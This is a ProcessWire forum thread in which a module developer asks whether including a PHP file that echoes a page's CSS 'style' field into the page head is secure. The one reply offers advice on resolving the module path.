Jump to content

security for including php file with str_replace


jploch
 Share

Recommended Posts

Hey there,

so Im working on this module wich adds css grid drag and drop functionality to a pagetableextended like field and I wonder if the following working approach would cause security issues? 

I save the positions and dimensions of the pagetable items in one text field (named style) on the page in css syntax (its also easy to save css for different responsive sizes this way using my js code).

Now I created a file for my css called style.php:

<?php
namespace ProcessWire; 
//in admin page var needs to be set
if($isAdmin = $this->page->rootParent->id == 2) {
$page = $this->pages->get((int) wire('input')->get('id'));
}
?>

<style id='pgrid-style'>
 <?php echo $page->style ?>
</style>

This is how I include that file in my module for the backend:

$this->addHookAfter('Page::render', function($event) {
            $page = $event->object;
            $value = $event->return; // Return Content
            $p = $this->pages->get((int) wire('input')->get('id'));
           
//          // include style if page has style field
         if ($page->process == 'ProcessPageEdit' && count($p->pgrid_style_desktop)) {
            $dir = dirname(__FILE__);   
            ob_start();
            include("$dir/css/style.php"); 
            $contents = ob_get_contents();
            ob_end_clean();

            $event->return = str_replace("</head>", "\n\t{$contents}</head>", $value); // Return All Changes
          }
          
             });

On frontend in head of main template:

<!--  module css-->
  <?php include($config->paths->site ."modules/PageTableExtendedGrid/css/style.php");?>


 

Link to comment
Share on other sites

Hi,

for better readability and more stability in edge cases, I would use the $config->paths->get("NameOfMyModule") syntax to get the exact matching path to your modules root directory. This is working even if someone, for example, dropped in the module from zip from github and the directory name became something different like "NameOfMyModule-master". I only would use this in front- and back end.

$includeFilename = $config->paths->get("NameOfMyModule") . 'css/style.php';

 

  • Like 2
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...